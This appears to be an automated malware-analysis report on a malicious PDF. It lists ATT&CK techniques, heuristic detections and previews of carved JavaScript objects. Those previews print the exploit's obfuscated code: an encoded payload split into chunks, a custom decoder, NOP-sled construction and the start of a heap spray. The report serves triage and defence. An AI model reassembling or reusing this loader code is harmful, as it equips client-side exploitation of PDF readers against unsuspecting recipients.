MALICIOUS
Risk Score: 116

Malware Insights

MITRE ATT&CK
- T1059.007 JavaScript
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that is heavily obfuscated. Heuristics indicate this JavaScript is part of an exploit cluster, likely leveraging a PDF vulnerability to achieve code execution. The script concatenates multiple strings into a variable named 'pay', which is then decoded using a custom algorithm. This decoded content is likely a secondary payload or further malicious code.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (4)
- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (32)
Files carved from inside the sample during analysis. Each preview shows the first 1,000 lines of the extracted script.
| Filename | Hash | Kind | Source | Size | Detection | Preview script |
|---|---|---|---|---|---|---|
| javascript_obj0010_001.js | f9ae5a33db8c7c1304813e927490f51369c0114e1b7e481ce8d3cc0f2f95f72e | pdf-javascript-stream | PDF /JS object 10 at offset 0x3667 | 40 bytes | | `var ppp=new Array();var nnn=new Array();` |
| javascript_obj0012_003.js | 4b79b97d4935cd2b901a576eefe7be0f816f4358f58b4a9126ff967a1878c524 | pdf-javascript-stream | PDF /JS object 12 at offset 0x3719 | 68 bytes | | `ppp[1]='GJNLMENJHECEPECLMJFKLBLFDBECBDADECBDIDMCMELLJMFIANOBJCCDAN';` |
| javascript_obj0013_004.js | 4f51fe12d59294efe69f3fcba522a7c1e33606f70299ad8ef55f3801e38910bb | pdf-javascript-stream | PDF /JS object 13 at offset 0x3797 | 92 bytes | | `ppp[2]='BALIIANEGJOGNMFHDPLLCNNCFHMHILNIFEICAAICKJCEDGCLFMBGIJAPFDFCJNNOIJIFAOMJHCHAEDMLAK';` |
| javascript_obj0014_005.js | 10589daa65a5097ee6d2b8a37141069c9a1f0ea999703bc774cff1961e23b95e | pdf-javascript-stream | PDF /JS object 14 at offset 0x382D | 50 bytes | | `ppp[3]='HMKNCMOFINFPGFFNJFLPFKMMIOLMJGPLJHAGHCCM';` |
| javascript_obj0015_006.js | f86e12618118cc96c4cb9171f8dc58fc001334798f65bf5966ff492f4f17c494 | pdf-javascript-stream | PDF /JS object 15 at offset 0x3899 | 32 bytes | | `ppp[4]='LJDALMJBGPADOFFCIMEHAB';` |
| javascript_obj0016_007.js | f343008922bdb67b6f756e621aba0189521d0c602027aa4dc19bc78e7039a90f | pdf-javascript-stream | PDF /JS object 16 at offset 0x38F3 | 52 bytes | | `ppp[5]='DOFLEKAJKACKIDNLFGAJGOICNFNLBBBLGJLBOBJIBF';` |
| javascript_obj0017_008.js | aa64b7222b86e8c9471ff2cc84f9e7c93036ac2be656b903dbff4d31f2d0184a | pdf-javascript-stream | PDF /JS object 17 at offset 0x3961 | 68 bytes | | `ppp[6]='BPNPELMDOFBLPOMENGNMGCPGMGNMBIAOJCFBHHJEPOKEKAACLFNNPGIHBM';` |
| javascript_obj0018_009.js | a7c3332722d920ea11c9a1d0e93169aa570ff432e92d914dba1692a8c74340d0 | pdf-javascript-stream | PDF /JS object 18 at offset 0x39DF | 96 bytes | | `ppp[7]='HPHHEMLBIBHHCEHFOOCIPFNKOFHLFIHFLDMBBIPFDOHAFDLICMIKHOKAAHGJPJPIJKHLDNGIEAGIENFBPPPDBE';` |
| javascript_obj0019_010.js | 3432f1f0ab59f76f6c9ff54262b39e489f1f3384062fe72152d6e34be5370b84 | pdf-javascript-stream | PDF /JS object 19 at offset 0x3A79 | 44 bytes | | `ppp[8]='FEOOJJJICJJICEAONMPCPNGJKEMGONJECG';` |
| javascript_obj0020_011.js | 61939e5da9310a70b929b1fcfebcf6b0d023b68de3b806576a64e0c888fb1e33 | pdf-javascript-stream | PDF /JS object 20 at offset 0x3ADF | 80 bytes | | `ppp[9]='BFJNOIMHFMCCBCAPHGHKGHEFGEMNCOOKDMLMBLMACIFKCNBFLHMHPLOALABOJDKINPJNFN';` |
| javascript_obj0021_012.js | 00c349590fb9e559e6657ea5f56766c5842b71ff6a964fb6518527492639fab4 | pdf-javascript-stream | PDF /JS object 21 at offset 0x3B69 | 35 bytes | | `ppp[10]='BEHCJJKONLFJLPBOFNOLLEGG';` |
| javascript_obj0022_013.js | 95cda11176a2c477629c613149a9ab08533760952d8fb332ad144d1495207b80 | pdf-javascript-stream | PDF /JS object 22 at offset 0x3BC6 | 97 bytes | | `ppp[11]='JHEAFLKOGMMMPCGKEHPHFBHBMOPBEPACGKIEIEPBIBAOCHAEOLMPBIMMPOMALPDMOFOIDGIKBNEKMMGICEBJEF';` |
| javascript_obj0023_014.js | eb8b25cd09d025c628612ee78f29c115897bc5c1a858dc47b620195c0496d618 | pdf-javascript-stream | PDF /JS object 23 at offset 0x3C61 | 39 bytes | | `ppp[12]='IBMKKNCOOLDOPMNGONHFKNEHAKEG';` |
| javascript_obj0025_016.js | 94b999d7fd418e1ee22ca11265e1f4254a2299aa688479986892377998b4c53a | pdf-javascript-stream | PDF /JS object 25 at offset 0x3D1B | 85 bytes | | `ppp[14]='GAGOPHCAMCEKFJIJGMNOOGICADNFPMHMJCBLAFLFLJJMGHIKAENFDJPILHJDAOHMLEFIGLOGPO';` |
| javascript_obj0026_017.js | 86d917e9428d0f8d6788588992428a1a90dfb852d67095ef963cc4ab6f74ca53 | pdf-javascript-stream | PDF /JS object 26 at offset 0x3DAA | 81 bytes | | `ppp[15]='JBOGBAFPIHGGDFCLEECHDCEDICAFPGGCCIKALOJPNOPJOKDDPMHAMODCDOCCJOGEKJJIKB';` |
| javascript_obj0028_019.js | 1b0e5895b82f637e5a5e8bf65701d28c82aa374f20867d02322ea30364685777 | pdf-javascript-stream | PDF /JS object 28 at offset 0x3E84 | 63 bytes | | `ppp[17]='ECICENMIJLAFKDGFGEDLFOMGOENBOPBIAFLNHFMKMEMAGIBABMFD';` |
| javascript_obj0029_020.js | ba3b484dfaef144484e43e5d53b3819bb01370101788408aeb0c24c6f64b88a9 | pdf-javascript-stream | PDF /JS object 29 at offset 0x3EFD | 69 bytes | | `ppp[18]='KKBPLKNOKBNIBICCMDOGNGFJFEAMIGFKPBDCPAPBLPEKACBMIEHMFNIPDD';` |
| javascript_obj0030_021.js | 4fae6815b8eb4b3473a9e3aeb7a04b9a2f9dbc9fb01bfcb3245c386a4fe4859e | pdf-javascript-stream | PDF /JS object 30 at offset 0x3F7C | 95 bytes | | `ppp[19]='GIEJPMPLNPMBKLJIHAONKMOLFIPAGEDOJJJGPMIBOKGJPKMPJGMKIDHMAAGGGCNJEAICCAMAAKKKHNHEPMDB';` |
| javascript_obj0032_023.js | a4942a89274176102db8fe0380ab3a078ae7a2bc447afc97f70eefd5b69849f8 | pdf-javascript-stream | PDF /JS object 32 at offset 0x405E | 89 bytes | | `ppp[21]='LJLLBNAOEHOBGDPBOAHFMPOBGJNBMJIJJAOHLMDGCNNBODLIFPOHJOFAAECFEMEDFNNDANOLKHMGHH';` |
| javascript_obj0033_024.js | 3040f9648032e7a9f15c1e5a60488bc13c6df3d4e035022299320cbc184adffe | pdf-javascript-stream | PDF /JS object 33 at offset 0x40F1 | 87 bytes | | `ppp[22]='CEIBIPCAELLLKFDMPGBLOKCHJEIJDNBMMDLNBBJPKONKCDFMNJAENBANLLHEGAINNBJBIIIGGNKJ';` |
| javascript_obj0035_026.js | 69d519693877b040c0da2c89b6826dbab2457ee234392ec678ad88ef292f837c | pdf-javascript-stream | PDF /JS object 35 at offset 0x41D5 | 77 bytes | | `ppp[24]='CENAGBCAANLEPHDINEFKKAPFPNFJCFJNBBBLHCIPDNEMPIFLHAOCDHEOKBKAPFHJHG';` |
| javascript_obj0036_027.js | b3abe5cf567cb1babf2b99a101485d9bd544ca5d5d6fb21fa12c52eb706723ea | pdf-javascript-stream | PDF /JS object 36 at offset 0x425C | 89 bytes | | `ppp[25]='PDPLMNKKMKAPIPPEFBGCIEFNFPAKEJDFCJHMODDEHBBBPJHNHGHGMIGMCDKNBLODBIJGKIBFIBPIFG';` |
| javascript_obj0037_028.js | a823b9f2c7d1300640eec51c3d10ec7a1504077b93dc12332c480a9f5e6097f7 | pdf-javascript-stream | PDF /JS object 37 at offset 0x42EF | 55 bytes | | `ppp[26]='OHMFEEKNEKEBGEHGHLCDAKMEPLNOLGHFDCFIACNCHMLD';` |
| javascript_obj0038_029.js | f5c614d9b7cf6673afb4d0e082697765f08bb4a3fdfb4a96fd411a87a07fe25f | pdf-javascript-stream | PDF /JS object 38 at offset 0x4360 | 97 bytes | | `ppp[27]='KEGKHHHGJBGMKLDKHAMCMJHBMKIHHNFFJJBGDFGLPLCOAJNLMKEODHBNIGJMLIDJJEEEGILJMKFFFAJPLDPCKK';` |
| javascript_obj0040_031.js | d7e377619ea5da1acb1f37211c4d35e0224bedd9ad2d94e0e027a228e0e21573 | pdf-javascript-stream | PDF /JS object 40 at offset 0x444E | 41 bytes | | `ppp[29]='GEDIKNCFDDLGHNJINPDDILODMHKLMB';` |
| javascript_obj0049_040.js | 5919c0d1d84a5a746be9f27963881ad88d4190b52b00795a7bba41f91757774f | pdf-javascript-stream | PDF /JS object 49 at offset 0x46F1 | 49 bytes | | `var pay='';for (i=0;i<ppp.length;i++)pay+=ppp[i];` |
| javascript_obj0050_041.js | 9882b77792295f132527561d187f85c94b2cd973564768e464959f18c36b3adf | pdf-javascript-stream | PDF /JS object 50 at offset 0x475E | 51 bytes | | `var nnn2='';for (i=0;i<nnn.length;i++)nnn2+=nnn[i];` |
| javascript_obj0051_042.js | d0c51bf80c2b774fd7e3f148d01ffbc945e29725fa0df8312c7ee2e2af01f03e | pdf-javascript-stream | PDF /JS object 51 at offset 0x47CD | 121 bytes | ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token). | `var nops='';for(i=0;i<nnn2.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+nnn2.charCodeAt(i+j)-65;nops+=String.fromCharCode(c);}` |
| javascript_obj0052_043.js | b1b2b43288ce70ec200b2f13b08007f27b53e440ecc0d66f3597d77149e048d4 | pdf-javascript-stream | PDF /JS object 52 at offset 0x4888 | 119 bytes | ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token). | `var coqu='';for(i=0;i<pay.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+pay.charCodeAt(i+j)-65;coqu+=String.fromCharCode(c);}` |
| javascript_obj0053_044.js | cdb00d413dd3dc5b9d3e3780f1775e73dbb44b071a24019bd9d4f5472f12fea2 | pdf-javascript-stream | PDF /JS object 53 at offset 0x4941 | 42 bytes | | `var nop='';for(i=0;i<128;i++)nop=nop+nops;` |
| javascript_obj0054_045.js | 887c4000e5cc4d9dfa6111f1e7cc04f6b55e03f5444509a403960cb208d351ee | pdf-javascript-stream | PDF /JS object 54 at offset 0x49A7 | 52 bytes | | `heapblock=nop+coqu;big=nops;spr=20+heapblock.length;` |
| javascript_obj0055_046.js | a653d442e9d9975c7c5174f7ea9a37c7bf1baee2798fc9562ccd829a21fc371f | pdf-javascript-stream | PDF /JS object 55 at offset 0x4A15 | 95 bytes | | `while(big.length<spr)big=big+big;fill=big.substring(0,spr);blk=big.substring(0,big.length-spr);` |